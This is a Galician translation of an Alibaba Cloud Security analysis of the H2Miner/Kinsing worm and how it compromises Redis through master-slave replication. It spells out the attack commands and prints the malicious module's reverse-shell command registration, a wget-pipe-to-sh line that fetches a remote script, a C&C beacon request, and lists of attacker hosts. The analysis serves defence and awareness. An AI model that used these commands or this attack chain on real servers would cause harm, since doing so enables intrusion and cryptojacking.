Hai un día, un dos servidores do meu proxecto foi atacado por un verme semellante. Na procura dunha resposta á pregunta "que foi iso?" Atopei un gran artigo do equipo de Alibaba Cloud Security. Como non atopei este artigo sobre Habré, decidín traducilo especialmente para ti <3
Entrada
Recentemente, o equipo de seguridade de Alibaba Cloud descubriu un brote repentino de H2Miner. Este tipo de gusanos maliciosos utiliza a falta de autorización ou contrasinais débiles para Redis como pasarelas dos seus sistemas, tras o cal sincroniza o seu propio módulo malicioso co escravo mediante a sincronización mestre-escravo e, finalmente, descarga este módulo malicioso na máquina atacada e executa programas maliciosos. instrucións.
No pasado, os ataques aos teus sistemas realizábanse principalmente mediante un método que implicaba tarefas programadas ou claves SSH que se escribían na túa máquina despois de que o atacante iniciase sesión en Redis. Afortunadamente, este método non se pode usar a miúdo debido a problemas co control de permisos ou debido a diferentes versións do sistema. Non obstante, este método de carga dun módulo malicioso pode executar directamente os comandos do atacante ou acceder ao shell, o que é perigoso para o teu sistema.
Debido á gran cantidade de servidores Redis aloxados en Internet (preto de 1 millón), o equipo de seguridade de Alibaba Cloud, como recordatorio amigable, recomenda que os usuarios non compartan Redis en liña e comproben regularmente a solidez dos seus contrasinais e se están comprometidos. selección rápida.
H2Miner
H2Miner é unha botnet de minería para sistemas baseados en Linux que pode invadir o teu sistema de varias maneiras, incluída a falta de autorización nas vulnerabilidades de Hadoop yarn, Docker e Redis Redis remote command execution (RCE). Unha botnet funciona descargando scripts e programas maliciosos para minar os teus datos, expandir o ataque horizontalmente e manter comunicacións de mando e control (C&C).
Redis RCE
O coñecemento sobre este tema foi compartido por Pavel Toporkov en ZeroNights 2018. Despois da versión 4.0, Redis admite unha función de carga de complementos que ofrece aos usuarios a posibilidade de cargar ficheiros compilados con C en Redis para executar comandos específicos de Redis. Esta función, aínda que útil, contén unha vulnerabilidade na que, no modo mestre-escravo, os ficheiros poden sincronizarse co escravo mediante o modo de resincronización completa. Isto pode ser usado por un atacante para transferir ficheiros maliciosos. Despois de completar a transferencia, os atacantes cargan o módulo na instancia de Redis atacada e executan calquera comando.
Análise de vermes de malware
Recentemente, o equipo de seguridade de Alibaba Cloud descubriu que o tamaño do grupo de mineiros maliciosos H2Miner aumentou de súpeto drasticamente. Segundo a análise, o proceso xeral de aparición do ataque é o seguinte:
H2Miner usa RCE Redis para un ataque completo. Os atacantes atacan primeiro servidores Redis desprotexidos ou servidores con contrasinais débiles.
Despois usan o comando config set dbfilename red2.so para cambiar o nome do ficheiro. Despois diso, os atacantes executan o comando slaveof para establecer o enderezo do host de replicación mestre-escravo.
Cando a instancia de Redis atacada establece unha conexión mestre-escravo co Redis malicioso que é propiedade do atacante, o atacante envía o módulo infectado mediante o comando fullresync para sincronizar os ficheiros. O ficheiro red2.so descargarase na máquina atacada. A continuación, os atacantes usan o módulo de carga ./red2.so para cargar este ficheiro so. O módulo pode executar comandos dun atacante ou iniciar unha conexión inversa (porta traseira) para acceder á máquina atacada.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Despois de executar un comando malicioso como / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, o atacante restablecerá o nome do ficheiro de copia de seguridade e descargará o módulo do sistema para limpar os rastros. Non obstante, o ficheiro red2.so aínda permanecerá na máquina atacada. Recoméndase aos usuarios que presten atención á presenza deste ficheiro sospeitoso no cartafol da súa instancia de Redis.
Ademais de matar algúns procesos maliciosos para roubar recursos, o atacante seguiu un script malicioso descargando e executando ficheiros binarios maliciosos para . Isto significa que o nome do proceso ou o nome do directorio que contén kinsing no host pode indicar que esa máquina foi infectada por este virus.
Segundo os resultados da enxeñaría inversa, o malware realiza principalmente as seguintes funcións:
- Cargando ficheiros e executalos
- Minaría
- Manter a comunicación C&C e executar ordes dos atacantes
Use masscan para a exploración externa para ampliar a súa influencia. Ademais, o enderezo IP do servidor C&C está codificado no programa e o host atacado comunicarase co servidor de comunicación C&C mediante solicitudes HTTP, onde a información do zombi (servidor comprometido) se identifica na cabeceira HTTP.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Outros métodos de ataque
Enderezos e ligazóns empregadas polo verme
/kinsing
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Consello
En primeiro lugar, Redis non debe ser accesible desde Internet e debe estar protexido cun contrasinal seguro. Tamén é importante que os clientes comproben que non hai ningún ficheiro red2.so no directorio Redis e que non hai "kinsing" no nome do ficheiro/proceso no servidor.
Fonte: www.habr.com